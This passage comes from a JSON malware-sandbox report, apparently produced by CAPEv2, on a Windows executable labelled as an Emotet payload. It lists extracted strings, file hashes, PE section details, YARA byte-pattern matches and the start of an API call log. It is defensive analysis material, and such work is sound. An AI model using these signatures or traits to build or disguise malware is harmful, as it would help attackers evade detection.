".?AVCNoTrackObject@@", + "Please enter a number.*Please enter an integer between %1 and %2.(Please enter a number between %1 and %2.(Please enter no more than %1 characters.", + ".?AVCDockContext@@", + "lstrcpynA", + "CResourceException", + "G,PUU", + "F8 Wt", + "slovak", + " Windows", + "DisableThreadLibraryCalls", + "%s\\ShellNew", + "U89EtpL", + "///>(((", + "CToolBar", + "RSSSSS", + "TerminateProcess", + "YYt@V", + "C$PjQVj", + "StartDocA", + "Ht^Ht", + "EnumDisplayMonitors", + "MoveFileA", + "an unnamed file", + "ImageList_Destroy", + "belgian", + "9O9c9n9t9{9", + "Circle", + "_^][YY", + "@[^_]", + "ov*v5", + "PrintDlgA", + "u FPF", + "CMenu", + "uWPw'", + "No error message is available.'An unsupported operation was attempted.$A required resource was unavailable.", + ".?AVCAfxStringMgr@@", + "Microsoft Corporation", + ".?AVCRecentFileList@@", + "EnableWindow", + "french-canadian", + "zr*zM", + "NullFile", + "msvcrt.dll", + "MultiByteToWideChar", + "Translation", + "AfxOldWndProc423", + " !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~", + "Uruguay", + "%s\\DefaultIcon", + "$F9t#E$", + "G;~4|", + "AccessibleObjectFromWindow", + "6+6X6^6h6n6w6", + "KERNEL32", + " (8PX", + "Invalid filename.", + ".PAVCOleException@@", + "msctls_hotkey32", + "spanish-ecuador", + "CreatePopupMenu", + ">2^d3", + "File%d", + "american", + "LineTo", + "F(Pj,", + "GetDCEx", + "UpdateWindow", + "ImageList_Merge", + "u!SSSS", + "swedish-finland", + "RegisterEventSourceA", + "RegDeleteKeyA", + "OleDuplicateData", + "3Dw", + "SelectClipRgn", + "Norwegian-Nynorsk", + "1#SNAN", + "SetCapture", + "OZrzC#", + "CView", + "InternalName", + "Seek failed on %15A hardware I/O error was reported while accessing %1.0A sharing violation occurred while accessing %1.0A locking violation occurred while accessing %1.", + "internal state. The program cannot safely continue execution and must", + ".?AVCScrollBar@@", + "1, 0, 0, 1", + "CLSID", + "FlsAlloc", + "LoadMenuA", + "FileVersion", + "spanish-mexican", + "english-ire", + "October", + "RegSetValueExA", + "PathIsUNCA", + "GetSubMenu", + "u79=XDH", + "g", + "YYu(j", + "P(;~pu", + "NoRemove", + "HH:mm:ss", + "SetRectRgn", + "@_^0S,Y", + "GetPrivateProfileIntA", + "Point", + "Belgium", + "Yt:SVW", + "Hardware", + "VEIdH{", + "Microsoft Visual C++ Runtime Library", + "GetDCOrgEx", + "SWVt,j", + "F(@;F,v", + "95|'H", + "Z|T)mca;)", + "Swedish", + "SetROP2", + "LLL:EEE", + "Basque", + "Y9E t", + "Program: ", + "GetLastActivePopup", + "GetCurrentDirectoryA", + "=dFWk", + "Global", + "comdlg32.dll", + "MessageBoxA", + "english-caribbean", + "===-***", + "Paraguay", + "+toHt_HtOHt6Ht", + "CompareStringW", + "QQSV3", + "SetMenu", + "VC20XC00U", + "GetStringTypeExA", + "Register", + "GetLastError", + "GetMenuStringA", + "$J'De", + "InvalidateRect", + "GetCharWidthA", + "F0Pj.", + "PQQQQQ", + "south-africa", + "CombineRgn", + "dutch-belgian", + "SetWindowExtEx", + "rasctrs", + "accParent", + "CButton", + "C\\+Cd+E", + "GetClipBox", + "GetWindowTextLengthA", + "InsertMenuItemA", + "britain", + "%s\\shell\\open\\%s", + "Cd+C\\", + ".?AV_AFX_THREAD_STATE@@", + "PeekMessageA", + ".?AVAFX_MODULE_STATE@@", + "SetPolyFillMode", + "RegCreateKeyExA", + "[print(\"", + "SUVWP", + "FlsSetValue", + "GM>:,", + "hhhHNNN", + "LocalAlloc", + "ErT`_", + "T$$RPQ", + "GetVersionExA", + "QueryServiceStatus", + "'/OzL", + "GetLocaleInfoA", + "YaccDoDefaultAction", + "u{.?oH", + "lstrcatA", + "<<<|...", + "Mexico", + "RICHED20.DLL", + "SendDlgItemMessageA", + "STATIC", + "GetEnvironmentStrings", + "S@Ph<", + "i:_D4", + ".tgPV", + "tLSh=", + "CException", + "Saturday", + "1GG;E", + "EndDialog", + "oG<-uK", + "DISPLAY", + "WVWWW", + "PathFindFileNameA", + "Failed to launch help.", + "u-j@Y", + "TextOutA", + "WWWWh", + "tttEggg", + "666Q$$$", + "OffsetRect", + "GetUserDefaultLCID", + "`.data", + ".text", + "GetWindowThreadProcessId", + "GetDlgItemTextA", + "CopyRect", + ".?AVCUIntArray@@", + "OffsetWindowOrgEx", + ">c [y", + "WINSPOOL.DRV", + "CFont", + "spanish-costa rica", + "September", + "DragFinish", + "i/lm!V", + "V0]c?", + "SYBpY", + "YYtVj", + "GetTimeZoneInformation", + "Runtime Error!", + ".?AVCWinApp@@", + "GetOEMCP", + "SSSw:::", + "9Ocen", + "OffsetClipRgn", + "italian-swiss", + ".?AVCByteArray@@", + ".PAVCException@@", + ".?AVCAccessibleProxy@ATL@@", + ">>h000", + "FreeResource", + "SysHeader32", + "Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.", + "RASMAN", + "March", + ".?AVCEditView@@", + "W$ } ", + "ReadClassStg", + "SetWindowOrgEx", + "Cannot find this file.", + "[printto(\"%1\",\"%2\",\"%3\",\"%4\")]", + "SelectClipPath", + "_initterm", + "OiNlh", + ".PAVCResourceException@@", + "@ h(((( H", + "t*UUW", + "StringFromGUID2", + "SetTextAlign", + "Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else..An unexpected error occurred while reading %1..An unexpected error occurred while writing %1.", + "CPaintDC", + "%I64d", + "It[IItM", + "IntersectRect", + "=sRTj", + ":wX?m", + ".}huD~$NN", + "UK@qM", + "- not enough space for thread data", + "GetWindowExtEx", + "GetObjectA", + "BMy9s", + "t4SUWV", + ".?AVCOleException@@", + "IntersectClipRect", + "Unexpected file format.V%1", + "[open(\"", + "GetFocus", + "CharLowerW", + "accChild", + "GetDialogBaseUnits", + "RegEnumKeyA", + "IsClipboardFormatAvailable", + ".?AVCControlBar@@", + ".?AVAFX_MODULE_THREAD_STATE@@", + "TlsSetValue", + "spanish-peru", + "CreateFileA", + "South Africa", + "F$Pj+", + "1#INF", + ".?AVCNotSupportedException@@", + "IsBadReadPtr", + "(null)", + "GetClassInfoExA", + "LC_TIME", + "RegOpenKeyA", + "TLOSS error", + "RegOpenKeyExA", + "_[^]Y", + "9;twV", + "CMiniDockFrameWnd", + "French", + "Mt_^[", + "GetTopWindow", + "CInvalidArgException", + "DestroyWindow", + "^(_^][", + "DispatchMessageA", + ";=,'H", + "CMemoryException", + "GetParent", + "C/PjSVj", + "~ESVW", + "CListCtrl", + "Automation", + "D$ }l", + "GetJobA", + "english-aus", + "%1 was not found.", + "_]^[YY", + "GetSystemTimeAsFileTime", + "PolyBezierTo", + "EnumDisplayDevicesA", + "NotifyServiceStatusChangeA", + "FindTextA", + ";AxtOh,", + "9t.9Q", + "CStatic", + "mscoree.dll", + "FLPjI", + "111[WWW", + "accFocus", + "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", + "german-austrian", + "BBFFf", + "CByteArray", + "August", + "CControlBar", + "pppQ]]]", + "PVVWV", + "$hxw'", + "GetDC", + "pixels", + "An unknown error has occurred.$An invalid argument was encountered.", + "999r%%%", + "GetPrivateProfileStringA", + "VirtualProtect", + "DocumentPropertiesA", + "SetConvertStg", + "|||twww", + "AfxFrameOrView70s", + ".?AVCFileDialog@@", + "GetPixel", + "AAAe///", + "MSD-?", + "_j X;", + "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Comdlg32", + "LoadIconA", + "SUVW3", + "RegCloseKey", + "<<<%<<<", + "t7f)6?fk!", + "PUSVV", + "GrayStringA", + "CRichEditCtrl", + "SjZc", + "#Unable to read write-only property.#Unable to write read-only property.", + "u\\SVh", + "5(6.6;6E6M6U6[6a6y6", + "FreeEnvironmentStringsW", + "GetViewportExtEx", + "EnumMetaFile", + "-np1A", + "am/pm", + "9t/9Q", + "VI9L$", + "GetSystemInfo", + "SysAnimate32", + "GetClassNameA", + "FindResourceA", + ".?AVCRgn@@", + "SetMapperFlags", + "ToolbarWindow32", + "QueryPerformanceCounter", + "DDD>===", + "- not enough space for environment", + "ASSSS", + "F(t]P", + "Dominican Republic", + "COMCTL32.dll", + "accName", + "'''5(((", + "LockResource", + "ImageList_Read", + "$7N|5p", + "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}", + "F8PjD", + "accNavigate", + "AdjustWindowRectEx", + "LCMapStringW", + ".?AVtype_info@@", + "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Network", + "lstrcmpiA", + "The file is too large to open.", + "MonitorFromWindow", + "spanish-panama", + "]t@G:", + "R6025", + "england", + "9_Tu'", + "COMBOBOX", + "R6009", + "msctls_progress32", + "@9=\\F", + " ((((( H", + "CMapStringToPtr", + "GetTickCount", + "LSVWj", + "_amsg_exit", + "40G=]", + "american english", + "Convert objects", + "Failed to open document.", + "yNX#L", + "t$Wh=X@", + "JanFebMarAprMayJunJulAugSepOctNovDec", + "PlayMetaFile", + "BeginPaint", + "DrawTextA", + "CEditView", + "November", + "FreeEnvironmentStringsA", + "CreateDIBPatternBrushPt", + "C+PjUVj", + "F Pj*", + ".?AV_AFX_HTMLHELP_STATE@@", + "9~du\"h", + "wsprintfA", + "R6017", + "jWWWWWW", + "accRole", + "NoClose", + "commdlg_LBSelChangedNotify", + "GetProcAddress", + "*,4eK{", + "9=\\DH", + "Wu)95", + "SetBkMode", + "Out of memory.", + "e\\fDA", + "SVWUj", + "OpenRasPerformanceData", + "GetForegroundWindow", + "700WP", + "accHelpTopic", + "u+WWSW", + "u.;5`AH", + ".?AUIDispatch@@", + ".?AVCComboBox@@", + "SYSTEM\\CurrentControlSet\\Services\\RemoteAccess\\Performance", + "Buffer overrun detected!", + "spanish-nicaragua", + "CreateFontA", + "F|3C|%", + "Wj(_Wj", + "CreatePen", + "Australia", + "NoRun", + "InterlockedCompareExchange", + "ADVAPI32.dll", + "SHLWAPI.dll", + ".?AVCRichEditCtrl@@", + ".?AVCPrintingDialog@@", + "CreateHatchBrush", + "CProgressCtrl", + "Copyright (C) 2002", + "CNotSupportedException", + "ImageList_Write", + ".?AVCToolBar@@", + "GetScrollInfo", + "GetFileSize", + "spanish-colombia", + "ProductName", + "CvZdV", + "6669|||", + ".?AVCTreeCtrl@@", + "GetCPInfo", + "DuplicateHandle", + ".?AVCSimpleException@@", + "SYSTEM", + "Please enter a GUID.", + "Continue running script?", + "N 9^0", + "LockWindowUpdate", + "LeaveCriticalSection", + "FillRect", + "CallNextHookEx", + "-C37b\\", + "PlayMetaFileRecord", + "u.VV3", + "8SVW3", + "", + "8^s(5^s(", + "8$9a9k9", + "7P&=[T", + "=MM%]", + "3t.=TNN4", + "XTdb\"\\db\"YnO", + "t7=B:", + "xu_asu_aZP,=]", + "X\"tY=", + "3H4Q4~5", + "0n3w3", + "G,Pj^", + ":v:c;", + "7^7i7", + "PWSj<", + "t&=)/m", + "!gPho", + "QSVWQ3", + " PRQj\"", + " tF=f", + "%}>$5", + "1./tk=", + "=xcB.t==y", + ".ty=}", + "f%t8=", + "*VVVh", + "39t =[", + "kWC/M", + "PhrX@", + "tJ=0y", + "7Q8|8", + "Ht0Ht Ht", + "QQSVW", + "jXYj}", + "0'tR=", + "0C2=b?wj", + "&G1t*=", + "`.rdata", + "_G3tN=", + "#xgq!", + "p4j`R", + "+j.Y=", + "u&Vh7$@", + "+SVjX", + "tw=}P", + "t,=m>", + "jjjjj", + "~~&\\;v.];%m", + "YY_^[", + "4#5.5x5", + "!+t/=", + ")L/c'[", + "=-tQ=J", + "S#05\\#05", + "FVT&ODd", + "&!_,w3x", + "B:s5jcS", + "0D0[0r0", + "t,=@[r", + "RVj@Pj", + "QQSVW3", + "tA=0]4*", + "@OojJ", + "t9=D,k9u)", + ":y;Qe8!Q3}r", + "DSVW3", + ".reloc", + "0]4*=", + "R^4udj", + "6.6F6T7", + "\\::uK", + "tt=XCe", + ":tY=]", + "D,k9SVW", + "-l=U?uB:S", + "_0l*^*5", + "[\"t6=$", + "qMn?zT", + "!tL=:]", + "`/tY=", + "@.data", + ";^/u[", + "3*5;5y5", + "VWPj^", + "@n,RG", + "8^8|8", + "F|$tj=v" + ], + "virustotal": { + "error": true, + "msg": "Unable to complete connection to VirusTotal. Status code: 429" + }, + "cape_type_code": 8, + "cape_type": "Emotet Payload: 32-bit executable", + "process_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\3937597df70645ac297e.exe", + "process_name": "3937597df70645ac297e.exe", + "module_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\3937597df70645ac297e.exe", + "pid": 9436, + "virtual_address": "0x03CE0000" + }, + { + "name": "568a784c6081131de7e294fc77144255559d7b3346224e2a019d30bd77642ae9", + "path": "/opt/CAPEv2/storage/analyses/3959/CAPE/568a784c6081131de7e294fc77144255559d7b3346224e2a019d30bd77642ae9", + "guest_paths": "8;?C:\\Users\\pacop\\AppData\\Local\\Temp\\3937597df70645ac297e.exe;?C:\\Users\\pacop\\AppData\\Local\\Temp\\3937597df70645ac297e.exe;?0x025B0000;?", + "size": 32256, + "crc32": "FC4BD9D1", + "md5": "ed09fcb94554fc26ba9aaf96c5f97157", + "sha1": "3b6a7aaa7466a37b90039b906dc01ffcc7babc6f", + "sha256": "568a784c6081131de7e294fc77144255559d7b3346224e2a019d30bd77642ae9", + "sha512": "d785b9daa4fa80294027d5f35ad0418098da7ee6f2372ab57877914a9143a02c5109fc00802b40b0b6568b70d5f4ef9a4209e6ab4c81afb16810dfe34cdc91a8", + "rh_hash": null, + "ssdeep": "768:pyxe0QgcM2rL9z3KQ/NyXlGlTTkwtSVrlH0AISIl:pyAgWYQ/NSyTTkmsrlH0b", + "type": "PE32 executable (GUI) Intel 80386, for MS Windows", + "yara": [], + "cape_yara": [ + { + "name": "Emotet", + "meta": { + "author": "kevoreilly", + "description": "Emotet Payload", + "cape_type": "Emotet Payload" + }, + "strings": [ + "{ 85 C0 74 3D B9 F8 92 40 00 33 D2 89 48 08 89 48 34 8B 48 10 89 50 20 EB 04 41 89 48 10 39 14 CD F8 92 40 00 75 F3 8B CE E8 08 07 00 00 85 C0 74 05 33 C0 40 5E C3 }", + "{ EB 04 41 89 48 10 39 14 CD F8 92 40 00 75 F3 }" + ], + "addresses": { + "snippet8": 2574, + "snippetB": 2597 + } + } + ], + "clamav": [], + "tlsh": "T179E26D3394D7D0B3C5D288F3947FAA69522F7938025918F37748395679742A2731723B", + "sha3_384": "dc67d8b2aee3fb3fcf631868e2c6511912da1ba5a6d585ebc9e9da9c8c45dd76d4081b041974ddc8bb03b56f34bfcbb3", + "pe": { + "guest_signers": { + "aux_sha1": null, + "aux_timestamp": null, + "aux_valid": false, + "aux_error": true, + "aux_error_desc": "No signature found.", + "aux_signers": [] + }, + "digital_signers": [], + "imagebase": "0x00400000", + "entrypoint": "0x00004171", + "ep_bytes": "e8530600006a006861010000ba6c846b", + "peid_signatures": null, + "reported_checksum": "0x00000000", + "actual_checksum": "0x000166be", + "osversion": "6.0", + "pdbpath": null, + "imports": {}, + "exported_dll_name": null, + "exports": [], + "dirents": [ + { + "name": "IMAGE_DIRECTORY_ENTRY_EXPORT", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_IMPORT", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_SECURITY", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC", + "virtual_address": "0x0000b000", + "size": "0x00000138" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_DEBUG", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_TLS", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_IAT", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR", + "virtual_address": "0x00000000", + "size": "0x00000000" + }, + { + "name": "IMAGE_DIRECTORY_ENTRY_RESERVED", + "virtual_address": "0x00000000", + "size": "0x00000000" + } + ], + "sections": [ + { + "name": ".text", + "raw_address": "0x00000400", + "virtual_address": "0x00001000", + "virtual_size": "0x00006a84", + "size_of_data": "0x00006c00", + "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ", + "characteristics_raw": "0x60000020", + "entropy": "6.92" + }, + { + "name": ".rdata", + "raw_address": "0x00007000", + "virtual_address": "0x00008000", + "virtual_size": "0x00000002", + "size_of_data": "0x00000200", + "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ", + "characteristics_raw": "0x40000040", + "entropy": "0.00" + }, + { + "name": ".data", + "raw_address": "0x00007200", + "virtual_address": "0x00009000", + "virtual_size": "0x00001060", + "size_of_data": "0x00000a00", + "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE", + "characteristics_raw": "0xc0000040", + "entropy": "7.52" + }, + { + "name": ".reloc", + "raw_address": "0x00007c00", + "virtual_address": "0x0000b000", + "virtual_size": "0x00000138", + "size_of_data": "0x00000200", + "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ", + "characteristics_raw": "0x42000040", + "entropy": "4.20" + } + ], + "overlay": null, + "resources": [], + "versioninfo": [], + "imphash": "", + "timestamp": "2020-07-31 09:29:40", + "icon": null, + "icon_hash": null, + "icon_fuzzy": null, + "icon_dhash": null + }, + "data": null, + "strings": [ + "tD=ty", + "K!tq= +\\)tN=U[", + "TSVWjD", + "/tV=[", + "M\\} j", + "t1='K", + "=27C0", + "Q_PWj", + "7P&tz;", + "'tS=P", + "P]Zsy", + "?,t==", + "5SVW3", + "t:=w7 ", + "VSWh ", + "J^f'B", + "C(Y_^[", + "S-t(='", + "@WSjn", + "S-SVW3", + ".text", + "5t*='", + "Y6tR=", + "SSSSW", + "?%?,?", + "Ay%tL=O", + "tr=/y`", + "Wh/w@", + ";^/uP", + "\\::SVW", + "V\\9u`", + "1tm=]", + "z/te=", + "Y-h C7l&_0\"oV1j\"", + "mYj\"[", + "QQQVh", + "uBVVVVj'", + "a?Ud8.@.t&S?l&_07 S*};", + "1./t`=", + "7t4=q", + "mYj\"^", + "ngPj2", + "w!D;v;", + ")t!=\\", + "L!\\Pjo", + "PPVWh", + "1t%=f", + "=5=%>", + "8^s(5^s(", + "8$9a9k9", + "7P&=[T", + "=MM%]", + "3t.=TNN4", + "XTdb\"\\db\"YnO", + "t7=B:", + "xu_asu_aZP,=]", + "X\"tY=", + "3H4Q4~5", + "0n3w3", + "G,Pj^", + "!This program cannot be run in DOS mode.", + ":v:c;", + "7^7i7", + "PWSj<", + "t&=)/m", + "!gPho", + "QSVWQ3", + " PRQj\"", + " tF=f", + "%}>$5", + "1./tk=", + "=xcB.t==y", + ".ty=}", + "f%t8=", + "*VVVh", + "39t =[", + "kWC/M", + "PhrX@", + "tJ=0y", + "Rich/", + "7Q8|8", + "Ht0Ht Ht", + "QQSVW", + "jXYj}", + "0'tR=", + "0C2=b?wj", + "&G1t*=", + "`.rdata", + "_G3tN=", + "#xgq!", + "p4j`R", + "+j.Y=", + "u&Vh7$@", + "+SVjX", + "tw=}P", + "t,=m>", + "jjjjj", + "~~&\\;v.];%m", + "YY_^[", + "4#5.5x5", + "!+t/=", + ")L/c'[", + "=-tQ=J", + "S#05\\#05", + "FVT&ODd", + "&!_,w3x", + "B:s5jcS", + "0D0[0r0", + "t,=@[r", + "RVj@Pj", + "QQSVW3", + "tA=0]4*", + "@OojJ", + "t9=D,k9u)", + ":y;Qe8!Q3}r", + "DSVW3", + ".reloc", + "0]4*=", + "R^4udj", + "6.6F6T7", + "\\::uK", + "tt=XCe", + ":tY=]", + "D,k9SVW", + "-l=U?uB:S", + "_0l*^*5", + "[\"t6=$", + "qMn?zT", + "!tL=:]", + "`/tY=", + "@.data", + ";^/u[", + "3*5;5y5", + "VWPj^", + "@n,RG", + "8^8|8", + "F|$tj=v" + ], + "virustotal": { + "error": true, + "msg": "Unable to complete connection to VirusTotal. Status code: 429" + }, + "cape_type_code": 8, + "cape_type": "Emotet Payload: 32-bit executable", + "process_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\3937597df70645ac297e.exe", + "process_name": "3937597df70645ac297e.exe", + "module_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\3937597df70645ac297e.exe", + "pid": 9436, + "virtual_address": "0x025B0000" + }, + { + "name": "a87815a60683cb88d4caa06443a9e420734b2e91788c887716397d21cf69108d", + "path": "/opt/CAPEv2/storage/analyses/3959/CAPE/a87815a60683cb88d4caa06443a9e420734b2e91788c887716397d21cf69108d", + "guest_paths": "0;?C:\\Users\\pacop\\AppData\\Local\\Temp\\3937597df70645ac297e.exe;?C:\\Users\\pacop\\AppData\\Local\\Temp\\3937597df70645ac297e.exe;?", + "size": 36864, + "crc32": "78EAE6EC", + "md5": "bc7ea02ed056724ffe596bb91f56874e", + "sha1": "bc7496cca93754477dd88f8c8375eeb34c556b4d", + "sha256": "a87815a60683cb88d4caa06443a9e420734b2e91788c887716397d21cf69108d", + "sha512": "96c3e5a0e3a94174d1d024f08063beedbdfbee35831cb38e0d7922d1afe4d875674e979d7ee6e37ea8c3683c87b3cb872c133368015dd34ed3cc7daab5aeb6e5", + "rh_hash": null, + "ssdeep": "768:0pPwiyxe0QgcM2rL9z3KQ/NyXlGlTTkwtSVrlH0AISIlFgDiJ6:MwiyAgWYQ/NSyTTkmsrlH0bKr", + "type": "data", + "yara": [ + { + "name": "shellcode_peb_parsing", + "meta": { + "author": "William Ballenthin", + "email": "william.ballenthin@fireeye.com", + "license": "Apache 2.0", + "copyright": "FireEye, Inc", + "description": "Match x86 that appears to manually traverse the TEB/PEB/LDR data." + }, + "strings": [ + "{ 64 A1 30 00 00 00 53 55 56 8B 40 0C 57 89 4C 24 18 8B 70 0C E9 8A 00 00 00 8B 46 30 }" + ], + "addresses": { + "peb_parsing": 1130 + } + } + ], + "cape_yara": [], + "clamav": [], + "tlsh": "T1C4F27E3795D7D0F3C6D288F2947FAA69522F7838025928F37348385679743A2731723A", + "sha3_384": "a7e34059bf55da17643ad8c0d744e9967f4d6e1442f6861adc85027805ecd99828ba10632f944477748c896c7721c7a4", + "data": null, + "strings": [ + "tD=ty", + "K!tq= +\\)tN=U[", + "TSVWjD", + "/tV=[", + "M\\} j", + "yU", + "8^s(5^s(", + "8$9a9k9", + "7P&=[T", + "+D$\\;", + "=MM%]", + "3t.=TNN4", + "XTdb\"\\db\"YnO", + "t7=B:", + "xu_asu_aZP,=]", + "X\"tY=", + "3H4Q4~5", + "0n3w3", + "G,Pj^", + "!This program cannot be run in DOS mode.", + ":v:c;", + "7^7i7", + "D$ t`j", + "PWSj<", + "t&=)/m", + "!gPho", + "sQ_oX", + "QSVWQ3", + " PRQj\"", + "9T$`t", + "%}>$5", + "1./tk=", + " tF=f", + "=xcB.t==y", + ".ty=}", + "f%t8=", + "*VVVh", + "39t =[", + "FmJ1\\F", + "aSy|UM", + "jjjjj", + "'f;D$$u", + "~~&\\;v.];%m", + "YY_^[", + "4#5.5x5", + "!+t/=", + ")L/c'[", + "8xQ.g$q", + "=-tQ=J", + "S#05\\#05", + "FVT&ODd", + "&!_,w3x", + "B:s5jcS", + ";8}Wb ", + "D8x+L8", + "0D0[0r0", + "SUVW3", + "t,=@[r", + "RVj@Pj", + "QQSVW3", + "tA=0]4*", + "@OojJ", + "GTYV/B", + "t9=D,k9u)", + ":y;Qe8!Q3}r", + "DSVW3", + ".reloc", + "0]4*=", + "R^4udj", + "6.6F6T7", + "@W4P:", + "\\::uK", + "tt=XCe", + "Rn]?>@", + ":tY=]", + "D,k9SVW", + "l/;H&u4", + "-l=U?uB:S", + "_0l*^*5", + "[\"t6=$", + "qMn?zT", + "!tL=:]", + "`/tY=", + "@.data", + ";^/u[", + "3*5;5y5", + "VWPj^", + "@n,RG", + "8^8|8", + "F|$tj=v" + ], + "virustotal": { + "error": true, + "msg": "Unable to complete connection to VirusTotal. Status code: 429" + }, + "cape_type_code": 0, + "cape_type": "unknown", + "process_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\3937597df70645ac297e.exe", + "process_name": "3937597df70645ac297e.exe", + "module_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\3937597df70645ac297e.exe", + "pid": 9436 + } + ], + "configs": [] + }, + "info": { + "version": "2.4-CAPE", + "started": "2025-03-07 23:32:51", + "ended": "2025-03-07 23:36:13", + "duration": 202, + "id": 3959, + "category": "file", + "custom": "", + "machine": { + "id": 3959, + "status": "stopping", + "name": "baseline", + "label": "win10-2", + "platform": "windows", + "manager": "KVM", + "started_on": "2025-03-07 23:32:51", + "shutdown_on": "2025-03-07 23:36:12" + }, + "package": "exe", + "timeout": true, + "shrike_url": null, + "shrike_refer": null, + "shrike_msg": null, + "shrike_sid": null, + "parent_id": null, + "tlp": null, + "parent_sample": {}, + "options": {}, + "source_url": null, + "route": "false", + "user_id": 0, + "CAPE_current_commit": "f89c890143b59bdbcc9b9c8b5e15fbc5fd827afd" + }, + "behavior": { + "processes": [ + { + "process_id": 9436, + "process_name": "3937597df70645ac297e.exe", + "parent_id": 4864, + "module_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\3937597df70645ac297e.exe", + "first_seen": "2025-03-07 22:33:07,782", + "calls": [ + { + "timestamp": "2025-03-07 22:33:07,954", + "thread_id": "9440", + "caller": "0x757393d9", + "parentcaller": "0x7703dda2", + "category": "system", + "api": "LdrpCallInitRoutine", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "MappedPath", + "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\SHCore" + }, + { + "name": "BaseAddress", + "value": "0x76d00000" + }, + { + "name": "InitRoutine", + "value": "0x76d42480" + }, + { + "name": "Reason", + "value": "1" + } + ], + "repeated": 0, + "id": 0 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x73ec8c37", + "parentcaller": "0x73ec73e7", + "category": "misc", + "api": "HeapCreate", + "status": true, + "return": "0x04c30000", + "arguments": [ + { + "name": "Options", + "value": "0" + }, + { + "name": "InitialSize", + "value": "0x00001000" + }, + { + "name": "MaximumSize", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 1 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756b71bf", + "parentcaller": "0x73ec84e1", + "category": "system", + "api": "LdrGetDllHandle", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "KERNELBASE.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x755a0000" + } + ], + "repeated": 0, + "id": 2 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNELBASE.dll" + }, + { + "name": "ModuleHandle", + "value": "0x755a0000" + }, + { + "name": "FunctionName", + "value": "FlsAlloc" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x756db050" + } + ], + "repeated": 0, + "id": 3 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNELBASE.dll" + }, + { + "name": "ModuleHandle", + "value": "0x755a0000" + }, + { + "name": "FunctionName", + "value": "FlsGetValue" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x756ba9b0" + } + ], + "repeated": 0, + "id": 4 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNELBASE.dll" + }, + { + "name": "ModuleHandle", + 